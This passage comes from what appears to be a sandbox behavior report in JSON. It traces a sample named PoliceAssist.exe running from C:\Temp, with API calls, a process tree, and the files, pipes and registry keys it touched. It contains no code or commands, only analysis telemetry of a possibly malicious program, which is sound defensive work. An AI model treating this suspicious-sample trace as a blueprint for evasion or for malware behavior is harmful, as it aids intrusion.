"parentcaller": "0x7ffee336ef53", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0xfffffffe" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x0000057c" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 37 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "2480", "caller": "0x7ffed3fea85f", "parentcaller": "0x7ffed3fea778", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "E7D35CFA-348B-485E-B524-252725D697CA" }, { "name": "ClsContext", "value": "0x80000001", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL" }, { "name": "riid", "value": "D5F569D0-593B-101A-B569-08002B2DBF7A" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 38 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "2480", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffee2f66d2f", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0xfffffffe" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x00000574" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 39 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4396", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffee336ef53", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0xfffffffe" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x0000060c" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 40 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4396", "caller": "0x7ffee2fb92b9", "parentcaller": "0x7ffee2ff224d", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "674B6698-EE92-11D0-AD71-00C04FD8FDFF" }, { "name": "ClsContext", "value": "0x00000403", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "riid", "value": "00000003-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 41 }, { "timestamp": "2025-11-20 10:58:33,850", "thread_id": "4396", "caller": "0x7ffee2fb92b9", "parentcaller": "0x7ffee2ff224d", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "4590F812-1D3A-11D0-891F-00AA004B2E24" }, { "name": "ClsContext", "value": "0x00000403", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "riid", "value": "00000003-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 1, "id": 42 }, { "timestamp": "2025-11-20 10:59:21,725", "thread_id": "2360", "caller": "0x7ff630564340", "parentcaller": "0x00000000", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "4FA18276-912A-11D1-AD9B-00C04FD8FDFF" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "00000000-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 43 }, { "timestamp": "2025-11-20 10:59:21,725", "thread_id": "2360", "caller": "0x7ff630564340", "parentcaller": "0x00000000", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "3BC15AF2-736C-477E-9E51-238AF8667DCC" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 44 }, { "timestamp": "2025-11-20 10:59:21,725", "thread_id": "2360", "caller": "0x7ff630564340", "parentcaller": "0x00000000", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "674B6698-EE92-11D0-AD71-00C04FD8FDFF" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "44ACA674-E8FC-11D0-A07C-00C04FB68820" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 45 }, { "timestamp": "2025-11-20 10:59:25,100", "thread_id": "3352", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffee336ef53", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0xfffffffe" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x00000274" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 46 } ], "threads": [ "3508", "348", "3804", "4252", "2480", "4396", "2360", "3352" ], "environ": { "UserName": "￑￈￑ᅭᅤᅩ￀", "ComputerName": "HOME-PC", "WindowsPath": "C:\\Windows", "TempPath": "C:\\Temp\\", "CommandLine": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p", "RegisteredOwner": "", "RegisteredOrganization": "", "ProductName": "", "SystemVolumeSerialNumber": "a0c0-2cc3", "SystemVolumeGUID": "2d3f192c-0000-0000-0000-300300000000", "MachineGUID": "", "MainExeBase": "0x7ff630560000", "MainExeSize": "0x00010000", "Bitness": "64-bit" }, "file_activities": { "read_files": [], "write_files": [], "delete_files": [] } } ], "anomaly": [], "processtree": [ { "name": "explorer.exe", "pid": 2552, "parent_id": 2516, "module_path": "C:\\Windows\\explorer.exe", "children": [], "threads": [ "3400", "2800", "2996", "2768", "3512", "2840", "4072", "4068", "4032", "3360" ], "environ": { "UserName": "Admin", "ComputerName": "HOME-PC", "WindowsPath": "C:\\Windows", "TempPath": "C:\\Temp\\", "CommandLine": "C:\\Windows\\Explorer.EXE", "RegisteredOwner": "", "RegisteredOrganization": "", "ProductName": "", "SystemVolumeSerialNumber": "a0c0-2cc3", "SystemVolumeGUID": "2d3f192c-0000-0000-0000-300300000000", "MachineGUID": "", "MainExeBase": "0x7ff735ff0000", "MainExeSize": "0x00546000", "Bitness": "64-bit" } }, { "name": "PoliceAssist.exe", "pid": 3308, "parent_id": 2736, "module_path": "C:\\Temp\\PoliceAssist.exe", "children": [], "threads": [ "2188", "2060", "1600", "404", "3824", "2432", "1596", "3408", "4536", "1704", "2336", "3704", "4488" ], "environ": { "UserName": "Admin", "ComputerName": "HOME-PC", "WindowsPath": "C:\\Windows", "TempPath": "C:\\Temp\\", "CommandLine": "\"C:\\Temp\\PoliceAssist.exe\" ", "RegisteredOwner": "", "RegisteredOrganization": "", "ProductName": "", "SystemVolumeSerialNumber": "a0c0-2cc3", "SystemVolumeGUID": "2d3f192c-0000-0000-0000-300300000000", "MachineGUID": "", "MainExeBase": "0x140000000", "MainExeSize": "0x0013a000", "Bitness": "64-bit" } }, { "name": "svchost.exe", "pid": 740, "parent_id": 600, "module_path": "C:\\Windows\\System32\\svchost.exe", "children": [ { "name": "WmiPrvSE.exe", "pid": 3164, "parent_id": 740, "module_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "children": [], "threads": [ "3424", "1388", "1260", "4244", "4248", "4240", "4280" ], "environ": { "UserName": "HOME-PC$", "ComputerName": "HOME-PC", "WindowsPath": "C:\\Windows", "TempPath": "C:\\Temp\\", "CommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", "RegisteredOwner": "", "RegisteredOrganization": "", "ProductName": "", "SystemVolumeSerialNumber": "a0c0-2cc3", "SystemVolumeGUID": "2d3f192c-0000-0000-0000-300300000000", "MachineGUID": "", "MainExeBase": "0x7ff79aaf0000", "MainExeSize": "0x0007e000", "Bitness": "64-bit" } } ], "threads": [ "912", "324", "2872", "4640" ], "environ": { "UserName": "￑￈￑ᅭᅤᅩ￀", "ComputerName": "HOME-PC", "WindowsPath": "C:\\Windows", "TempPath": "C:\\Temp\\", "CommandLine": "C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p", "RegisteredOwner": "", "RegisteredOrganization": "", "ProductName": "", "SystemVolumeSerialNumber": "a0c0-2cc3", "SystemVolumeGUID": "2d3f192c-0000-0000-0000-300300000000", "MachineGUID": "", "MainExeBase": "0x7ff630560000", "MainExeSize": "0x00010000", "Bitness": "64-bit" } }, { "name": "svchost.exe", "pid": 3212, "parent_id": 600, "module_path": "C:\\Windows\\System32\\svchost.exe", "children": [], "threads": [ "3508", "348", "3804", "4252", "2480", "4396", "2360", "3352" ], "environ": { "UserName": "￑￈￑ᅭᅤᅩ￀", "ComputerName": "HOME-PC", "WindowsPath": "C:\\Windows", "TempPath": "C:\\Temp\\", "CommandLine": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p", "RegisteredOwner": "", "RegisteredOrganization": "", "ProductName": "", "SystemVolumeSerialNumber": "a0c0-2cc3", "SystemVolumeGUID": "2d3f192c-0000-0000-0000-300300000000", "MachineGUID": "", "MainExeBase": "0x7ff630560000", "MainExeSize": "0x00010000", "Bitness": "64-bit" } } ], "summary": { "files": [ "\\Device\\Bam", "C:\\", "C:\\Temp", "C:\\Temp\\PoliceAssist.exe", "C:\\Windows\\apppatch\\sysmain.sdb", "C:\\Temp\\policeassist.exe", "C:\\SystemResources\\policeassist.exe.mun", "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\Windows\\Explorer", "C:\\Windows\\WindowsShell.Manifest", "C:\\Windows\\System32\\kernel.appcore.dll", "\\Device\\CNG", "C:\\Windows\\Fonts\\staticcache.dat", "C:\\Temp\\TextShaping.dll", "C:\\Windows\\System32\\TextShaping.dll", "C:\\Windows\\Globalization\\Sorting\\sortdefault.nls", "C:\\Windows\\System32\\uxtheme.dll.Config", "C:\\Windows\\System32\\uxtheme.dll", "C:\\Windows\\System32\\windows.storage.dll", "C:\\Temp\\Wldp.dll", "C:\\Windows\\System32\\wldp.dll", "C:\\Windows\\System32\\sxs.dll", "C:\\Windows\\System32\\wbem\\wbemdisp.tlb", "C:\\Windows\\System32\\C_1252.NLS", "C:\\Windows\\System32\\stdole2.tlb", "C:\\Windows\\System32\\winhttp.dll", "C:\\Windows\\System32\\ru-RU\\mswsock.dll.mui", "C:\\Windows\\System32\\ru-RU\\wshqos.dll.mui", "C:\\Temp\\ncrypt.dll", "C:\\Windows\\System32\\ncrypt.dll", "C:\\Windows\\System32\\ci.dll", "C:\\Windows\\System32\\dnsapi.dll", "C:\\Windows\\System32\\wuaueng.dll", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\System32\\NgcRecovery.dll", "C:\\Windows\\System32\\ru-RU\\CRYPT32.dll.mui", "\\??\\PhysicalDrive0", "C:\\Windows\\SystemResources\\USER32.dll.mun", "C:\\Windows\\System32\\ru-RU\\USER32.dll.mui", "C:\\Windows\\System32\\rpcss.dll", "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM", "C:\\Windows\\System32\\winbrand.dll", "C:\\Windows\\Branding\\Basebrd\\basebrd.dll", "C:\\Windows\\Branding\\Basebrd\\ru-RU\\Basebrd.dll.mui", "C:", "C:\\Windows\\System32\\secur32.dll", "C:\\Windows\\System32\\tzres.dll", "C:\\Windows\\System32\\ru-RU\\tzres.dll.mui", "C:\\Windows\\System32\\samcli.dll", "C:\\Windows\\System32\\srvcli.dll", "C:\\Windows\\System32\\netutils.dll", "C:\\Windows\\System32\\logoncli.dll", "C:\\Windows\\System32\\schedcli.dll", "C:\\Windows\\System32\\wkscli.dll", "C:\\Windows\\System32\\dsrole.dll", "\\??\\PIPE\\wkssvc", "\\??\\PIPE\\srvsvc", "C:\\Windows\\System32\\wbem\\ru-RU\\cimwin32.dll.mui" ], "read_files": [], "write_files": [ "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM", "\\??\\PIPE\\wkssvc", "\\??\\PIPE\\srvsvc" ], "delete_files": [], "keys": [ "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest", "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa\\FipsAlgorithmPolicy", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\STE", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\Enabled", "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\MDMEnabled", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Policies\\Microsoft\\Cryptography\\Configuration", "HKEY_CURRENT_USER", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Themes\\Personalize", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Themes\\Personalize\\AppsUseLightTheme", "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\CustomLocale", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\ru-RU", "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\ExtendedLocale", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\ru-RU", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0\\Disable", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0\\DataFilePath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane1", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane2", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane3", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane4", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane5", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane6", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane7", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane8", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane9", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane10", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane11", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane12", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane13", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane14", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane15", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane16", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Segoe UI", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions\\000603xx", "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\Sorting\\Ids", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\ru-RU", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\ru", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\Compatibility\\PoliceAssist.exe", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Category", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Name", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\ParentFolder", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Description", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\RelativePath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\ParsingName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\InfoTip", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\LocalizedName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Icon", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Security", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\StreamResource", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\StreamResourceType", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\LocalRedirectOnly", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Roamable", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\PreCreate", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Stream", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\PublishExpandedPath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\DefinitionFlags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Attributes", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\FolderTypeID", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\InitFolderHandler", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\PropertyBag", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ProgramFilesDir (x86)", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444B-8957-A3773F02200E}", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Category", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Name", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\ParentFolder", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Description", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\RelativePath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\ParsingName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\InfoTip", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\LocalizedName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Icon", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Security", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\StreamResource", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\StreamResourceType", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\LocalRedirectOnly", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Roamable", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\PreCreate", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Stream", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\PublishExpandedPath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\DefinitionFlags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Attributes", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\FolderTypeID", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\InitFolderHandler", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\PropertyBag", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ProgramFilesDir", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Category", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Name", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\ParentFolder", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Description", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\RelativePath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\ParsingName", 